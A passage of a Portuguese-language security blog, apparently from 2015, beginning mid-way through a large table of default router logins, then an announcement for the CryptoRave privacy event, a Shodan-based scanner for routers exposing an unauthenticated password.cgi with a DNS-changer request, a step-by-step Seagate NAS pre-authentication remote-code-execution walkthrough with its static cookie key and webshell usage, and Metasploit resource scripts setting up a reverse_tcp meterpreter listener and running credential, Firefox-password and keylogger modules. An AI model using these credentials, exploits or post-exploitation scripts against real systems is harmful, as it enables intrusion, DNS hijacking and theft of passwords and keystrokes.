SP3361 (Micronet Firmware) admin trendchip Micronet – SP888B (Micronet Firmware) admin admin Micronet – SP916GK (Micronet Firmware) admin 1234 Microsoft – MN-100 (Microsoft Firmware)  admin Microsoft – MN-500 (Microsoft Firmware)  admin Microsoft – MN-700 (Microsoft Firmware)  admin Motorola – CPEo 450 (Motorola Firmware)   Motorola – Netopia 2210-02 (AT&T Firmware)   Motorola – Netopia 2241N-VGX (Bell Shouth Firmware)   Motorola – Netopia 2241N-VGX (Netopia Firmware)   Motorola – Netopia 2247-02 (Eircom Firmware)   Motorola – Netopia 3346N-VGx (Motorola Italian Firmware)   Motorola – Netopia 3347-02 (Qwest Firmware)   Motorola – Netopia 3347NWG-006 (Netopia Firmware)   Motorola – Netopia Cayman 3346-006 (Netopia Firmware) admin 1234 Motorola – SBG900 (Motorola Firmware) admin motorola Motorola – SVG2500 (Motorola Firmware) admin motorola Motorola – VT2142 (Motorola Firmware) router router Motorola – VT2442 (Motorola Firmware) router router Motorola – VT2542 (Motorola Firmware) router router Motorola – WR850G (Motorola Firmware) admin motorola MSI – RG54SE II (MSI Firmware) admin admin MSI – RG60G (MSI Firmware) admin admin MTNL – MT882 (MTNL Firmware) Admin Admin My Essentials – ME 1004-R (My Essentials Firmware)   Mymax – Access Point 54mbps (Mymax Firmware) admin password Myungmin – MWC-2500PW (Myungmin Firmware)   Netcomm – NB1300 Plus 4 (Netcomm Firmware) admin password Netcomm – NB5 (Netcomm Firmware) admin admin Netcomm – NB5Plus4 (Netcomm Firmware) admin admin Netcomm – NB6PLUS4W (Netcomm Firmware) admin admin Netcomm – NB9WMAXX (Netcomm Firmware) admin admin Netcomm – V210P (Netcomm Firmware) admin admin Netcore – 2005NR (Netcore Chinese Firmware) guest guest NetGear – CBVG834G (Darty Box French Firmware) admin password NetGear – CBVG834G (Netgear Firmware) admin password NetGear – CG3100 (Netgear Firmware) admin password NetGear – CG814GCMR (Netgear Firmware) admin password NetGear – CG814WG (Comcast Firmware) comcast 1234 NetGear – CG814WG (Optus Firmware) admin password NetGear – CG814WG v2 (Netgear Firmware) admin password NetGear – CVG824G (Netgear Firmware) admin password NetGear – CVG834G (NetGear Firmware) admin password NetGear – DG632 (NetGear Firmware) admin password NetGear – DG824M (NetGear Firmware) admin password NetGear – DG834 v3 (NetGear Firmware) admin password NetGear – DG834 v4 (NetGear Firmware) admin password NetGear – DG834G v2 (NetGear Firmware) admin password NetGear – DG834G v3 (NetGear Firmware) admin password NetGear – DG834G v4 (NetGear Firmware) admin password NetGear – DG834G v5 (NetGear Firmware) admin password NetGear – DG834G v5 (NetGear Italian Firmware) admin password NetGear – DG834GT (DGTeam v1 Italian Firmware) admin password NetGear – DG834GT (NetGear Firmware) admin password NetGear – DG834GU v5 (Optus Firmware) admin password NetGear – DG834N v2 (NetGear Firmware) admin password NetGear – DG834PN (NetGear Firmware) admin password NetGear – DG934G (Sky Firmware) admin sky NetGear – DGN2000 (NetGear Firmware) admin password NetGear – DGND3300 (NetGear Firmware) admin password NetGear – FVG318 (NetGear Firmware) admin password NetGear – FVL328 (NetGear Firmware) admin password NetGear – FVS124G (NetGear Firmware) admin password NetGear – FVS318v3 (NetGear Firmware) admin password NetGear – FVS338 (NetGear Firmware) admin password NetGear – FWG114P (NetGear Firmware) admin password NetGear – MR814 v2 (NetGear Firmware) admin password NetGear – MR814 v3 (NetGear Firmware) admin password NetGear – R0318 (NetGear Firmware) admin 1234 NetGear – RP614 v2 (NetGear Firmware) admin password NetGear – RP614 v3 (NetGear Firmware) admin password NetGear – RP614 v4 (NetGear Firmware) admin password NetGear – RP614 v4 (NetGear German Firmware) admin password NetGear – RT314 (NetGear Firmware) admin 1234 NetGear – WGR614 v5 (NetGear Firmware) admin password NetGear – WGR614 v6 (NetGear Firmware) admin password NetGear – WGR614 v7 (NetGear Firmware) admin password NetGear – WGR614 v8 (NetGear Firmware) admin password NetGear – WGR614 v9 (NetGear Firmware) admin password NetGear – WGT624 (NetGear Firmware) admin password NetGear – WGT624 v2 (NetGear Firmware) admin password NetGear – WGT624 v3 (NetGear Firmware) admin password NetGear – WGT624 v4 (NetGear Firmware) admin password NetGear – WGT634U (NetGear Firmware) admin password NetGear – WNDR3300 (NetGear Firmware) admin password NetGear – WNDR3700 (NetGear Firmware) admin password NetGear – WNR1000v2 (NetGear Firmware) admin password NetGear – WNR2000 (NetGear Firmware) admin password NetGear – WNR2000v2 (NetGear Firmware) admin password NetGear – WNR3500 v2 (NetGear Firmware) admin password NetGear – WNR3500L (NetGear Firmware) admin password NetGear – WNR834B v2 (NetGear Firmware) admin password NetGear – WNR854T (NetGear Firmware) admin password NetGear – WPN824 v1 (NetGear Firmware) admin password NetGear – WPN824 v2 (NetGear Firmware) admin password NetGear – WPN824 v3 (NetGear Firmware) admin password NetGear – WPNT834 (NetGear Firmware) admin password Netopia – 2210-02 (AT&T Firmware)   Netopia – 2241N-VGX (Bell Shouth Firmware)   Netopia – 2241N-VGX (Netopia Firmware)   Netopia – 2247-02 (Eircom Firmware)   Netopia – 3346N-VGx (Motorola Italian Firmware)   Netopia – 3347-02 (Qwest Firmware)   Netopia – 3347NWG-006 (Netopia Firmware)   Netopia – Cayman 3346-006 (Netopia Firmware) admin 1234 Network Everywhere – NWR11B (Network Everywhere Firmware)  admin Nexxt Solutions – NW230NXT14 (Nexxt Firmware) guest guest Nilox – 16NX080112001 (Nilox Firmware) admin admin Noganet – TEI-6608 (Noganet Firmware) admin admin Nokia Siemens Networks – 1600 (BSNL Firmware) admin admin Oiwtech – oiw-2401apg (Oiwtech Portuguese Firmware) root admin Olidata – Modem ADSL Router (GlobespanVirata Firmware)   Onda – EM4218 (DN7000 Firmware) admin 123456 OPEN – iConnect 625W (OPEN Firmware) root 0P3N OPEN – iConnect Access 611 (OPEN Firmware) root 0P3N OPEN – iConnect Access 621 (OPEN Firmware) root 0P3N OPEN – iConnect Access 624 (OPEN Firmware) root 0P3N Orient – WR514V1 (Orient Firmware) admin 1234 Origo – ASR-8400 (Origo Firmware) admin epicrouter OvisLink – EVO-W300AR (OvisLink Firmware) admin admin OvisLink – EVO-W54ARv2 (OvisLink Firmware) admin admin ParkerVision – WR1500 (ParkerVision Firmware)  1234 Parks – AltaVia 671 (Parks Firmware) root 1234 Pentagram Cerberus P 6331-42 (Pentagram Firmware) admin admin Pepwave – Surf-200 (Pepwave Firmware)  admin Philips – CGA5722 (Philips Firmware)   Philips – CPWBS154 (Philips Firmware)   Philips – p2 (Philips Firmware)   Philips – SNA6500 (Philips Firmware)   Philips – SNA6600-18 (Philips Firmware)   Philips – SNB5600 (Philips Firmware)   Pikatel – Airmax 101 (Pikatel Turkish Firmware) admin ttnet Pirelli – Alice Gate 2 Plus Wi-Fi (Telecom Italia Firmware)   Pirelli – DRG-A112 (Pirelli Firmware) admin admin Pirelli – DRG-A124G (Pirelli Firmware) admin admin Pirelli – DRG-A125G (Pirelli Firmware) admin admin Pirelli – DRG-A125G (Telecom Spanish Firmware) user user Pirelli – DRG-A225G (Pirelli Firmware) user user Pirelli – DRG-A266G (Pirelli Firmware) admin admin Pirelli – Netgate voip v2 (Pirelli Firmware) user user Planet – ADE-3100 (Planet Firmware) admin epicrouter Planet – ADE-3400 (Planet Firmware) admin epicrouter Planet – ADE-3410 (Planet Firmware) admin admin Planet – ADE-3411 (Planet Firmware) admin admin Planet – ADE-4100A (Planet Firmware) admin epicrouter Planet – ADE-4400 (Planet Firmware) admin admin Planet – ADW-4401 (Planet Firmware) admin admin Planet – WRT-414 (Planet Firmware) admin admin Planet – WRT-416 (Planet Firmware) admin admin Planet – XRT-401D (Planet Firmware) admin 1234 Planet – XRT-401E (Planet Firmware) admin admin Pluscom – WR-AR2317 (Pluscom Firmware) admin admin Postef – 8820U (Postef Firmware) admin admin Prolink – H5201 (Prolink Firmware) admin password Prolink – H9000 (Prolink Firmware) admin password Prolink – Hurricane 5200 (Prolink Firmware) admin password Prolink – Hurricane 9200AR (Prolink Firmware) admin password Prolink – Hurricane 9200P (Prolink Firmware) admin password Prolink – Hurricane H5305G (Prolink Firmware) admin password Prolink – WGR1004 (Prolink Firmware) admin password QPCOM – QP-WR254G (QPCOM Firmware) admin 1234 Repotec – RP-IP2404A (Repotec Firmware) admin admin Repotec – RP-IP509 (Repotec Firmware) admin admin Riger – DB102 (Riger Firmware) tmadmin tmadmin Riger – DB108-WL (Streamyx Firmware) tmadmin tmadmin Rosewill – RNX-EasyN4 (Rosewill Firmware) admin admin Rosewill – RNX-N4PS (Rosewill Firmware) admin admin RPC – I35 (RPC Firmware)   Safecom – GWART2-54125 (Safecom Firmware) admin admin Safecom – SWBR-5400 (Safecom Firmware)  admin Sagem – F@st 1201 (Sagem Firmware) admin admin Sagem – F@st 2404 (Sagem Firmware) admin admin Sagem – F@st 2504 (Sky Firmware) admin sky Sagem – F@st 2604 (JaWeb French Firmware) admin admin Sagem – F@st 3102 (Sagem Firmware) user user Sagem – F@st 3202 (Livebox English Firmware) admin admin Sagem – F@st 3202 (Livebox French Firmware) admin admin Sagem – Livebox 4305 (Livebox Firmware) admin password1 Sanex – SA-5100 (Sanex Firmware) admin admin Sanex – SA-C5210 (Sanex Firmware) admin admin Scientific Atlanta – DPR2320R2 (Scientific Atlanta Firmware)  admin Scientific Atlanta – EPC2434 (Scientific Atlanta Firmware)  admin Scientific Atlanta – EPR2320R2 (Scientific Atlanta Firmware)  admin SemIndia – DNA-A201SM (MTNL Firmware) admin admin SemIndia – DNA-A212 (MTNL Firmware) admin admin Serioux – SSR4100 (Serioux Firmware) admin admin Shiro – DSL805E (Shiro Firmware) admin admin Siemens – C2110 (Siemens Firmware) admin admin Siemens – Giga762SX (Siemens Firmware)  admin Siemens – Gigaset 504 AGU (Siemens Firmware)  admin Siemens – Gigaset SE260 (Siemens E9 Firmware) user user Siemens – Gigaset SE260 DSL (Siemens Firmware) admin admin Siemens – Gigaset SE261 (VNPT Firmware) admin password Siemens – Gigaset SE261 DSL (Siemens Firmware) admin admin Siemens – Gigaset SE361 (Siemens Firmware)  admin Siemens – Gigaset SE471 WiMax (Siemens Firmware) root a6a7wimax Siemens – Gigaset SE551 (Siemens German Firmware)  admin Siemens – Gigaset SE560 (Siemens Firmware) admin admin Siemens – Gigaset SE567 (Telus Firmware) admin telus177 Siemens – Gigaset SE587 (Tiscali Firmware) admin admin Siemens – Gigaset SX551 (Siemens Dutch Firmware)  admin Siemens – Gigaset SX551 (Siemens Firmware)  admin Siemens – Gigaset SX552 (Siemens Firmware)  admin Siemens – SL2-141 (Siemens Firmware) Admin Admin Siemens – Speedstream 4101 (Tiscali Firmware) admin admin Siemens – Speedstream 4200 (Siemens Firmware) admin admin Siemens – Speedstream 6520 (Bell Firmware) admin  Siemens – SpeedStream SE565 (Siemens Firmware) admin admin Sitecom – DC-202 v3 (Sitecom Firmware) admin admin Sitecom – DC-202 v5 (Sitecom Firmware) admin admin Sitecom – DC-202 v6 (Sitecom Firmware) admin admin Sitecom – DC-210 (Sitecom Firmware) admin admin Sitecom – DC-226 (Sitecom Firmware) admin admin Sitecom – DC-227 (Sitecom Firmware) admin admin Sitecom – WL-108 (Sitecom Firmware) admin sitecom46 Sitecom – WL-114 (Sitecom Firmware) admin admin Sitecom – WL-118 (Sitecom Firmware) admin admin Sitecom – WL-122 (Sitecom Firmware) admin admin Sitecom – WL-127 (Sitecom Firmware) admin admin Sitecom – WL-153 (Sitecom Firmware) admin admin Sitecom – WL-154 (Sitecom Firmware) admin admin Sitecom – WL-160 (Sitecom Firmware) admin admin Sitecom – WL-173 (Sitecom Firmware) admin admin Sitecom – WL-174 (Sitecom Firmware) admin admin Sitecom – WL-176 (Sitecom Firmware) admin admin Sitecom – WL-183 (Sitecom Firmware) admin admin Sitecom – WL-303 (Sitecom Firmware) admin admin Sitecom – WL-304 (Sitecom Firmware) admin admin Sitecom – WL-306 (Sitecom Firmware) admin admin   Leia mais: http://www.ndig.com.br/item/2010/03/username-e-senhas-padres-de-roteadores-e-modems#ixzz3UBTadMVJ

Se o Username ou Password estiver vazio significa que deve ser deixado em branco.
RouterUsernamePassword
(All Routers With DD-WRT v23 & v24 Firmware)rootadmin
(All Routers With Routertech v2.8 Firmware)AdminAdmin
(All Routers With Tomato v1 Firmware)adminadmin
2Wire – 1000HG (2Wire Firmware)
2Wire – 2071 (Prodigy Firmware)
2Wire – 2700HG-S (2Wire Firmware)
2Wire – 2700HGV-B2 (Sasktel Firmware)
2Wire – 2701-A (BigPond Firmware)
2Wire – 2701HG-B (AT&T Firmware)
2Wire – 2701HG-B (SBC Firmware)
2Wire – 2701HG-D (Qwest Firmware)
2Wire – 2701HG-G (Bell Firmware)
2Wire – 2701HG-G (Bell French Firmware)
2Wire – 2701HG-S (Embarq Firmware)




http://pastebin.com/AqKCxmVK

FONTE: http://www.ndig.com.br/item/2010/03/username-e-senhas-padres-de-roteadores-e-modems#ixzz3UBTadMVJ

quarta-feira, 11 de março de 2015

CryptoRave 2015 - 24 horas pela liberdade e privacidade na rede.

24 horas pela liberdade e privacidade na rede.
e18ce10144839b45af82b6bd5385b1f3
Em um mundo no qual precisamos das redes digitais para nos comunicar, nos informar e nos organizar, como resistir contra a vigilância em massa e a invasão de nossa privacidade? A CryptoRave 2015 é um evento de 24 horas contra a espionagem massiva, contra a violação das comunicações, em defesa da privacidade e da liberdade nas redes digitais. É um esforço coletivo para popularizar o uso de ferramentas de criptografia e de privacidade e para ampliar a segurança das pessoas que se comunicam nas redes. É um evento em defesa do direito à privacidade e da liberdade.  Entre 24 e 25 de abril de 2015 vamos realizar a segunda edição do encontro. A primeira CryptoRave foi em abril de 2014 em São Paulo e contou com a participação de aproximadamente 1000 (mil) pessoas. Os mesmos coletivos que organizaram a CryptoRave em 2014 (Actantes, Saravá, Escola de Ativismo), além de outros parceiros e indivíduos, vão realizar um grande evento para popularizar técnicas de privacidade, navegação anônima e práticas anti-vigilantistas e também discutir sobre os rumos da luta pela liberdade na rede.  A CryptoRave2015 seguirá o modelo adotado no ano passado, com atividades como oficinas, exposições, debates e palestras durante 24 horas ininterruptas, além da balada durante a madrugada, com DJ's e VJ's. Ao final, as pessoas realizarão a assinatura de suas chaves criptográficas para que possam se comunicar pelas redes de modo mais seguro. Haverá mais de 37 atividades e oficinas, além de palestras relâmpagos e do Espaço Ada, com atividades dedicadas a mulheres.

Em um mundo no qual precisamos das redes digitais para nos comunicar, nos informar e nos organizar, como resistir contra a vigilância em massa e a invasão de nossa privacidade? A CryptoRave 2015 é um evento de 24 horas contra a espionagem massiva, contra a violação das comunicações, em defesa da privacidade e da liberdade nas redes digitais. É um esforço coletivo para popularizar o uso de ferramentas de criptografia e de privacidade e para ampliar a segurança das pessoas que se comunicam nas redes. É um evento em defesa do direito à privacidade e da liberdade.

Entre 24 e 25 de abril de 2015 vamos realizar a segunda edição do encontro. A primeira CryptoRave foi em abril de 2014 em São Paulo e contou com a participação de aproximadamente 1000 (mil) pessoas. Os mesmos coletivos que organizaram a CryptoRave em 2014 (Actantes, Saravá, Escola de Ativismo), além de outros parceiros e indivíduos, vão realizar um grande evento para popularizar técnicas de privacidade, navegação anônima e práticas anti-vigilantistas e também discutir sobre os rumos da luta pela liberdade na rede.

A CryptoRave2015 seguirá o modelo adotado no ano passado, com atividades como oficinas, exposições, debates e palestras durante 24 horas ininterruptas, além da balada durante a madrugada, com DJ's e VJ's. Ao final, as pessoas realizarão a assinatura de suas chaves criptográficas para que possam se comunicar pelas redes de modo mais seguro. Haverá mais de 37 atividades e oficinas, além de palestras relâmpagos e do Espaço Ada, com atividades dedicadas a mulheres.



Este ano vamos receber convidados internacionais como:
  • . Peter Sunde, fundador do legendário site de compartilhamento de arquivos The Pirate Bay; 
  • . Micah Anderson, ativista e desenvolvedor do projeto LEAP ( https://leap.se ) e do sistema operacional livre Debian ( https://debian.org );
  • . Katitza Rodrigues, ativista da Electronic Frontier Foundation ( EFF - https://eff.org/ );
  • . Andre Meister, ativista pelos direitos digitais, jornalista investigativo sobre temas do digital.
A CryptoRave 2015 é aberta ao público em geral e mais especificamente a jovens, estudantes, jornalistas, publicitários, artistas, professores e diversos profissionais ou amadores, que queiram aprender a usar técnicas de comunicação segura. Visa também reunir ativistas e integrantes dos movimentos que querem defender sua comunicação de intrusos e arapongas, estatais e privados.

Orçamento

Como o dinheiro será gasto?
Usaremos os recursos arrecadados aqui para contribuir com a cobertura dos gastos no evento, principalmente para disponibilizar uma boa conexão de internet e streaming, e para trazer os convidados internacionais.


0xAJUDE NO FINANCIAMENTO:

https://www.catarse.me/pt/cryptorave2015
Doação via bitcoin para o endereço: 
122vFTdDHkNTWKE8JBVGgeuoKLFbKm8D5Q
-----------------------------------------------------------------------------------------------
CONTATO:
https://cryptorave.org/
https://twitter.com//cryptoravebr

quarta-feira, 4 de março de 2015

Roteadores vulneráveis (password.cgi)




  Recentemente desenvolvemos o scanner RouterHunter BR que trabalha pela internet procurando por faixa de ips pre-definidas ou aleatórias encontrando routers(roteadores) caseiros vulneráveis a vulnerabilidade DNSchanger.

 Routeh

 Então me veio a ideia de montar um script separado que trabalha-se com o Shodan fazendo praticamente um trabalho parecido com o do routerhunter. A unica diferença do routerhunter para esse script é que ele trabalha juntamente com o Shodan com uma dork(filter) definida procurando por ips das operadoras (CTBC, OI, GVT, TELEFONICA) que são as principais operadoras com routers(roteadores) vulneráveis e verificando se pagina (password.cgi) está online ou não. (password.cgi) é uma pagina dentro do router que não requisita autenticação!

  Nesses mesmos modelos de roteadores que é encontrada a pagina (password.cgi), Também pode ser encontrado o GET "dnscfg.cgi?dnsPrimary=DNS1&dnsSecondary=DNS2&dnsDynamic=0&dnsRefresh=1" que está presente no routerhunter. Então vamos colocar a mão na massa!

   Antes vamos instalar as dependências necessárias para a utilização do script:

  Depois de instalada todas as dependências vamos para a utilização do script.

Vocês iram precisar criar uma conta no Shodan.io
2 Vocês também iram precisar uma apikey para definir no código
3 Com a apikey nas mãos coloque ela na variável "key" na linha 31

  Vamos a execução do script

python routeh.py
  Ele ira iniciar o scan por ips no Shodan com a dork(filter) definida "DSL Router micro_httpd". Depois ele ira te retornar os IPS testados.

Processo Manual

 O processo manual seria de duas formas utilizando o Scanhub e o Nmap

No Scanhub você pode utilizar esse filtro "((DSL Router micro_httpd) AND country:"br") AND service_names:http"

No nmap você irar usar o comando "nmap -sV -p 80 189.15.100.0-255" 

DEMO
https:/github.com/jh00nbr 
http://twitter.com/jh00nbr

segunda-feira, 2 de março de 2015

Seagate Business NAS / Pre-Authentication Remote Code Execution (0day)

Seagate é um fornecedor bem conhecido em soluções de hardware, com produtos disponíveis em todo o mundo. Sua linha de produtos NAS dirigidas às empresas é chamado de Business Storage 2-Bay NAS. Estes podem ser encontrados dentro de redes domésticas e empresariais e, em muitos casos, eles são expostos publicamente.
Seagate é um fornecedor bem conhecido em soluções de hardware, com produtos disponíveis em todo o mundo. Sua linha de produtos NAS dirigidas às empresas é chamado de Business Storage 2-Bay NAS. Estes podem ser encontrados dentro de redes domésticas e empresariais e, em muitos casos, eles são expostos publicamente.


Os produtos que executam versões de firmware até a versão 2014,00319 foram encontrados vulnerabilidades que permitem a execução remota de código como usuário root.
Essas vulnerabilidades são exploráveis sem necessidade de qualquer forma de autorização no dispositivo.

Detalhes da Vulnerabilidade

Produtos Business Storage 2-Bay NAS vem com um aplicativo de gerenciamento de web habilitado. Este aplicativo permite que os administradores executem funções de configuração de dispositivos usuais, como a adição de usuários, a criação de controle de acesso, gerenciamento de arquivos etc...

A aplicação web é construído com as seguintes tecnologias de base:

  1. PHP versão 5.2.13 (Lançado 25 de fevereiro de 2010)
  2. CodeIgniter 2.1.0 (23 Lançado em novembro de 2011)
  3. Lighttpd 1.4.28 (Lançado 22 de agosto de 2010)

Todas essas três tecnologias são claramente desatualizadas, e as versões listadas do PHP e CodeIgniter são conhecidos por terem problemas de segurança. Em cima dessas tecnologias seta uma aplicação PHP personalizado, que contém em si uma série de brechas relacionadas à segurança é digamos bem problemático.

Detalhes sobre as tecnologias setadas acima o porque estão defasadas, tais versões.

PHP 5.2.3

As versões do PHP anteriores à 5.3.4 permitir aos usuários especificar caminhos de arquivo que incluem um byte NULL (CVE-2006-7243). Essa brecha permite que os dados controlados pelo usuário para encerrar prematuramente caminhos de arquivo, permitindo controle total sobre a extensão do arquivo.
Demonstrado por .php\0.jpg no final do argumento para a função file_exists.

CodeIgniter 2.1.0

Versões do CodeIgniter  2.2.0 criam tokens de sessão que são constituídos de um array associativo PHP serializado (hash), que foi criptografada usando um algoritmo personalizado.
Este hash de PHP contém dados controladas pelo utilizador, o que torna possível para os usuários uma extração de chave pa (criptografar e descriptografar) o conteúdo do cookie (CVE-2014-8686). Uma vez decifrados, os usuários podem modificar o conteúdo do cookie e re-encrypt antes de enviá-lo de volta para o servidor, resultando em outros vetores de ataque potenciais, incluindo PHP object injection.

Exploitation / Bypass

É simples de explorar os problemas listados acima para obter a execução de código arbitrário no dispositivo como o usuário root. Os principais passos necessários para alcançar este objectivo são:

O atacante deve escrever código PHP para o sistema de arquivos no NAS.
Isso pode ser feito de várias maneiras, incluindo:

  1. HTTP access envenenamento arquivo de log por meio do cabeçalho User-Agent.
  2. HTTP error envenenamento arquivo de registro através do cabeçalho do host.
  3. Modificando a descrição do dispositivo na interface do aplicativo web. Este escreve cadeias controladas pelo usuário para um arquivo localizado em /etc/DeviceDesc, no entanto, requer direitos administrativos.
  4. Upload de arquivos para um compartilhamento de arquivo que o dispositivo tenha exposto. 
  • O atacante deve, então, manipular o conteúdo da variável de idioma no cookie de sessão para que ele contém o caminho para o PHP controlado pelo invasor no sistema de arquivos.
  • A falha byte NULL em PHP deve ser utilizado no fim de este valor para forçar o PHP ignorar quaisquer caracteres que são acrescentados ao caminho do arquivo pelo aplicativo web.
  • O invasor, então, faz um pedido com os cookies manipulados, resultando na execução de código como root.

O Script-Exploit

 Beyond Binary(https://beyondbinary.io/) produziu um módulo Metasploit e um script Python standalone que automatizar o processo de exploração. Cada um desses scripts ter a seguinte abordagem:

  1. Conecta-se a meta de NAS e extrai um cookie ci_session.
  2. Decifrar o cookie usando a chave de criptografia estática de 0f0a000d02011f0248000d290d0b0b0e03010e07 e extrair o hash PHP.
  3. Modifica o hash PHP serializado para que o nome de usuário é definido como administrador e o campo is_admin está definido para yes.
  4. Criptografe essa hash atualizando o PHP pronto para uso posterior como um cookie ci_session. Este cookie permite agora que os futuros pedidos para operar no NAS como se fossem um administrador("DILIÇÇA CARA").
  5. Executar um pedido para extrair a configuração do host, que inclui a descrição do dispositivo.
  6. Modificar a configuração de host para que a descrição do dispositivo contenha uma pequena stager payload.
  7. Executar uma solicitação para atualizar a configuração do host com os novos dados, de modo que a stager payload é gravado em /etc/DeviceDesc.
  8. Modificar o hash PHP novamente para que o parâmetro de idioma contenha o  ../../../../etc/devicedesc\x00 como valor (note o byte NULL no final).
  9. Criptografar a nova hash PHP pronto para uso futuro como um cookie ci_session.
  10. Executar um pedido para NAS usando o cookie criado na etapa anterior. Isso chama a stager que foi escrito para o disco. Pedindo um mensagens como uma carga maior, que é gravado em disco na raiz do servidor web.
  11. Executa um outro pedido que, em seguida, redefine a configuração de host de volta ao que era antes da exploração.
Shodan(https://www.shodan.io/) relata que há mais de 2.500 dispositivos expostos publicamente na Internet que são possíveis vulneráveis.

Explots disponíveis para download aqui:

Beyond Binary(https://beyondbinary.io/) produziu um módulo Metasploit e um script Python standalone que automatizar o processo de exploração. Cada um desses scripts ter a seguinte abordagem:  Conecta-se a meta de NAS e extrai um cookie ci_session. Decifrar o cookie usando a chave de criptografia estática de 0f0a000d02011f0248000d290d0b0b0e03010e07 e extrair o hash PHP. Modifica o hash PHP serializado para que o nome de usuário é definido como administrador e o campo is_admin está definido para yes. Criptografe essa hash atualizando o PHP pronto para uso posterior como um cookie ci_session. Este cookie permite agora que os futuros pedidos para operar no NAS como se fossem um administrador("DILIÇÇA CARA"). Executar um pedido para extrair a configuração do host, que inclui a descrição do dispositivo. Modificar a configuração de host para que a descrição do dispositivo contenha uma pequena stager payload. Executar uma solicitação para atualizar a configuração do host com os novos dados, de modo que a stager payload é gravado em /etc/DeviceDesc. Modificar o hash PHP novamente para que o parâmetro de idioma contenha o  ../../../../etc/devicedesc\x00 como valor (note o byte NULL no final). Criptografar a nova hash PHP pronto para uso futuro como um cookie ci_session. Executar um pedido para NAS usando o cookie criado na etapa anterior. Isso chama a stager que foi escrito para o disco. Pedindo um mensagens como uma carga maior, que é gravado em disco na raiz do servidor web. Executa um outro pedido que, em seguida, redefine a configuração de host de volta ao que era antes da exploração.

----------------------------------------------------------------------------------------------------
https://beyondbinary.io/exploits/bbsec001/seagate_nas_php_exec_noauth.rb
OU
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb
----------------------------------------------------------------------------------------------------
https://beyondbinary.io/exploits/bbsec001/seagate_nas_php_exec_noauth.py
OU
http://www.exploit-db.com/exploits/36202/
----------------------------------------------------------------------------------------------------

Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution (0day)

Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the login page, and hence is open to attack from users without the need for authentication. The cookie can be easily decrypted using a known static encryption key and re-encrypted once the PHP object string has been modified. This module has been tested on the STBN300 device.

CVE-2014-8684 , CVE-2014-8686 , CVE-2014-8687

 Usage
 =====
 seagape.py <ip> <port> [-c [ua]]

 - ip   : ip or host name of the target NAS
 - port : port of the admin web ui
 - -c   : (optional) create a cookie which will give admin access.
          Not specifying this flag results in webshell installation.
 - ua   : (optional) the user agent used by the browser for the
          admin session (UA must match the target browser).
          Default value is listed below

 Example
 =======
 Install and interact with the web shell:
 seagape.py 192.168.0.1 80

 Create admin cookie
 seagape.py 192.168.0.1 80 -c
http://1337day.com/exploit/23338
----------------------------------------------------------------------------------------------------

REF:
http://www.rapid7.com/db/vulnerabilities/php-cve-2006-7243
https://beyondbinary.io/advisory/seagate-nas-rce/

segunda-feira, 23 de fevereiro de 2015

Metasploit automatização resource files

Trabalhando com resource files

O console (msfconsole ou msf pro) suporta automação básica usando scripts de recursos. Esses scripts contêm um conjunto de comandos do console que são executadas quando as cargas de script. Além dos comandos básicos do console (core), esses scripts também são tratados como modelos ERB. ERB é uma maneira de incorporar o código Ruby diretamente em um documento. Isso permite que você chamar APIs que não são expostos através de comandos de console e até programaticamente gerar e retornar uma lista de comandos com base em sua própria lógica. Scripts de recursos podem ser especificados com a opção -r para o Console Metasploit e é executado automaticamente na inicialização se ele existir. Scripts de recursos também pode ser executado a partir do prompt do console por meio do comando de recursos (msf  > resource file-to-run.rc)


O console (msfconsole ou msf pro) suporta automação básica usando scripts de recursos. Esses scripts contêm um conjunto de comandos do console que são executadas quando as cargas de script. Além dos comandos básicos do console (core), esses scripts também são tratados como modelos ERB. ERB é uma maneira de incorporar o código Ruby diretamente em um documento. Isso permite que você chamar APIs que não são expostos através de comandos de console e até programaticamente gerar e retornar uma lista de comandos com base em sua própria lógica. Scripts de recursos podem ser especificados com a opção -r para o Console Metasploit e é executado automaticamente na inicialização se ele existir. Scripts de recursos também pode ser executado a partir do prompt do console por meio do comando de recursos (msf  > resource file-to-run.rc)



O seguinte exemplo cria um arquivo de recurso para exibir o número da versão do metasploit.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch version.rc
echo 'version' >> version.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run  :  msfconsole -r version.rc
or    :  msfconsole -r /root/version.rc
or    :  msf > resource /root/version.rc



este arquivo de recurso irá carregar um directorio externo (ao msf) para que você possa apontar Metasploit aos seus 0-day, exploits, codificadores, cargas úteis (payloads), se estão a desenvolver exploits, auxiliarys, pós-módulos em ruby, então esta é a opção perfeita para que você possa carregar o seu directorio de trabalho no banco de dados do metasploit.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch startconf.rc
echo 'loadpath /home/secret/0day' >> startconf.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfconsole -r startconf.rc
or     :  msfconsole -r /root/startconf.rc
or     :  msf > resource /root/startconf.rc



Vamos criar um arquivo de recurso para iniciar um multi-manipulador (multi-handler) para nós. 
este 'listenner' vai receber a nossa carga útil (payload) reverse_tcp meterpreter.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch shell_listenner.rc
echo 'use exploit/multi/handler' >> shell_listenner.rc
echo 'set PAYLOAD windows/meterpreter/reverse_tcp' >> shell_listenner.rc
echo 'set LPORT 666' >> shell_listenner.rc
echo 'set LHOST 192.168.1.68' >> shell_listenner.rc
echo 'set ExitOnSession false' >> shell_listenner.rc
echo 'exploit -j -z' >> shell_listenner.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfconsole -r shell_listenner.rc
or     :  msfconsole -r /root/shell_listenner.rc
or     :  msf > resouce shell_listenner.rc



Scripts de auto-run são exelentes quando você precisa que varios módulos executem automaticamente
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch autoruncommands.rc
echo 'run post/windows/manage/migrate' >> autoruncommands.rc
echo 'run post/windows/gather/checkvm' >> autoruncommands.rc
echo 'run post/windows/gather/credential_collector' >> autoruncommands.rc
echo 'run post/multi/gather/firefox_creds' >> autoruncommands.rc
echo 'run post/windows/capture/keylog_recorder' >> autoruncommands.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msf > run multi_console_command -rc /root/autoruncommands.rc
ou executá-la no multi-manipulador (multi-handler) usando a flag AutoRunScript
